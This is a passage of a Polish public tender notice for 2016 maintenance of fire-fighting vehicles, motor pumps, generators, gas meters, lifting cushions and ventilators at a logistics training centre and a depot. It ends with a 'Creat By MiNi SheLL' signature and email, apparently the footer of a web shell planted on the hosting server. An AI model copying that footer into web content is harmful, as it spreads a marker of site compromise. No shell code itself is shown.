- sprawdzenie prawidłowej pracy systemu proszkowego
- sprawdzenie szczelności układu sterowania
- sprawdzenie prawidłowej pracy działka proszkowego ( sprawdzenie układu sterowania)
- wymiana manometru glicerynowego podciśnienia ssania wody  - 1  szt.
    
Jelcz 014 A32/10
- wymiana licznika obrotów silnika  - 1 szt. 
- wymiana dozownika środka pianotwórczego  -  1 szt.
- wymiana manowakuometru (01,5-01) -  1 szt.
- wymiana sita nasady 110  -  1 szt.

Star P142CJ A24/10 
- wymiana sita nasady 110  -  2 szt. 
- wymiana manowakuometru (01,5-01) -  1 szt.

Star 14.225 A20/10
- wymiana elektronicznego wskaźnika obrotów silnika  - 1 szt.
- wymiana sita nasady 110  -  1 szt.

Star 12.227 Zigler FP 16/8
- wymiana wskaźnika poziomu środka pianotwórczego - 2 szt. 
- wymiana wskaźnika poziomu wody  -  2 szt. 
- wymiana manowakuometru (01,5-01) -  1 szt. 
- wymiana licznika obrotów silnika  -  1 szt.

SPRZĘT	
STAR P142CJ A24/10	3 szt.	

STAR 14.225 A20/10	1 szt.	
JELCZ 014 A32/10	3 szt.	
JELCZ 010 A32/10	1 szt.	
STAR 12.227 Zigler FP 16/8	3 szt.	
SCANIA G440 CB 6x6 EHZ	1 szt.	
MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10: Przegląd okresowy motopomp pożarniczych, pomp pływających, pomp szlamowych i pólszlamowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 10: Przegląd okresowy motopomp pożarniczych, pomp pływających, pomp szlamowych i pólszlamowych

Nazwa czynności	
- sprawdzenie szczelności pompy
- przegląd elektroniki silnika
- sprawdzenie regulatora obrotów
- przegląd pompy
- przegląd pompy zasysającej
- wymiana oleju w regulatorze obrotów
- sprawdzenie gaźnika
- wymiana świec zapłonowych
- wymiana filtra powietrza,
- dokonanie próby szczelności i ciśnienia
- przegląd trokomatów
- wymiana filtra paliwa	
Ilość czynności w roku: raz w roku:czerwiec 	
Ilość sprzętu ogółem:13 szt.
Sprzęt:	
motopompa pożarnicza M8/8-1 silnik Kohler - 1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
motopompa pożarnicza M8/8-1 silnik Kohler - 1 szt. MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
pompy pływające Niagara 1 M4/2 -2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
pompa pływająca Niagara M4/2 Plus	-1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
pompa pływająca Posejdon M8/2 - 1 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
pompy pływające Posejdon M8/2 - 4 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
pompa szlamowa KTX 80X Honda (woda zanieczyszczona) - 1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
pompy półszlamowa 
SST-50 - 2 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11: Przegląd okresowy agregatów prądotwórczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 11: Przegląd okresowy agregatów prądotwórczych
Nazwa czynności	
-przegląd elektroniki silnika
-wymiana świec zapłonowych
-wymiana filtra powietrza
-wymiana oleju w silniku
-wymiana filtra oleju
-sprawdzenie parametrów pracy silnika
-sprawdzenie parametrów pod obciążeniem (moc max)
-sprawdzenie zabezpieczenia prądnicy
-kontrola gniazd wtykowych poboru energii
-dokonanie przeglądu poprawności działania przyrządów pomiarowych	

Ilość czynności w roku	raz w roku:czerwiec 	
Ilość sprzętu ogółem: 12 szt.

Sprzęt:	
agregaty prądotwórcze 
GX 200 Honda - 3 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
agregat prądotwórczy ED - 2400 GX 160 Honda - 1 szt.MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
 agregaty prądotwórcze Fogo FH5540, silnik Honda GX270 - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
agregaty prądotwórcze 
G 200 Honda Geko 2500 EA/HHBA - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
agregaty prądotwórcze 
FOGO FV 5540 X - silnik Briggs Stratton 9HP - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
agregat prądotwórczy 5-8 KVA - 1 szt. MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
agregat prądotwórczy Honda 4500 - 1 szt. MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12: Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096 - 3264 - 5 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 12: Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096 - 3264 - 5 szt.
Nazwa czynności	
przegląd i kalibracja
Ilość czynności w roku	 dwa razy
w roku:
maj, listopad	
Ilość sprzętu ogółem: 5 szt.

Sprzęt:	
mierniki gazów wybuchowych SCOTT 096-3264	5 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13: Przegląd okresowy poduszek niskociśnieniowych  Vetter.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 13: Przegląd okresowy poduszek niskociśnieniowych  Vetter 
Nazwa czynności	
-sprawdzenie szczelności, przegląd reduktorów i sterowników 
-dokonanie przeglądu poprawności działania przyrządów pomiarowych	
Ilość czynności w roku	
raz
w roku:
wrzesień	
Ilość zestawów ogółem
2 zestawy

Sprzęt:	
Poduszki niskociśnieniowe Vetter (w skład wchodzi 6 poduszek)	1 zestaw	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
Poduszki niskociśnieniowe Vetter
(w skład wchodzi 6 poduszek)	1 zestaw	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14: Przegląd okresowy poduszek wysokociśnieniowych Holmatro.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 14: Przegląd okresowy poduszek wysokociśnieniowych Holmatro
Nazwa czynności	
-sprawdzenie szczelności,    
-przegląd reduktorów i sterowników
-dokonanie przeglądu poprawności działania 
-przyrządów pomiarowych	
Ilość czynności w roku	
raz
w roku:
wrzesień	
Ilość zestawów ogółem 4 zestawy

Sprzęt:	
Poduszki wysokociśnieniowe Holmatro	4 zestawy	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15: Przegląd okresowy wentylatorów nadciśnieniowych PH-VP 450.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 15: Przegląd okresowy wentylatorów nadciśnieniowych PH-VP 450
Nazwa czynności	
- wymiana oleju
- wymiana filtrów
- wymiana świec zapłonowych
-przegląd zespołów elektroniki	
Ilość czynności w roku	
raz
w roku:
sierpień	
Ilość sprzętu ogółem: 11 szt. 

Sprzęt:	
wentylator PH-VP 450	10 szt.	MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
wentylator PH-VP 450	1 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16: Przegląd okresowy Agregatu pompowego 8000/8 na przyczepie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 16: Przegląd okresowy Agregatu pompowego 8000/8 na przyczepie
Nazwa czynności	
-wymiana oleju
-wymiana filtra paliwa
-wymiana świec zapłonowych
-przeprowadzenie próby ciśnieniowej pod kątem szczelności	
Ilość czynności w roku	
raz
w roku:
wrzesień	
Ilość sprzętu ogółem 1 szt. 

Sprzęt:	
agregat pompowy 8000/8 na przyczepie	1 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17: Przegląd okresowy motopomp pożarniczych TOHATSU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 17: Przegląd okresowy motopomp pożarniczych TOHATSU
Nazwa czynności	
- sprawdzenie szczelności pompy
- przegląd elektroniki silnika
- sprawdzenie regulatora obrotów
- przegląd pompy
- przegląd pompy zasysającej
- wymiana oleju w regulatorze obrotów
- sprawdzenie gaźnika
- wymiana świec zapłonowych
- wymiana filtra powietrza
- dokonanie próby szczelności i ciśnienia
- przegląd  trokomatów
- wymiana filtra paliwa	
Ilość czynności w roku	raz w roku:
październik	
Ilość sprzętu ogółem 17 szt. 

Sprzęt:	
motopompy pożarnicze TOHATSU M8/8	1 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
motopompy pożarnicze  TOHATSU VC 72 AS	14 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
motopompy pożarnicze  TOHATSU M8/8 PO-380	2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com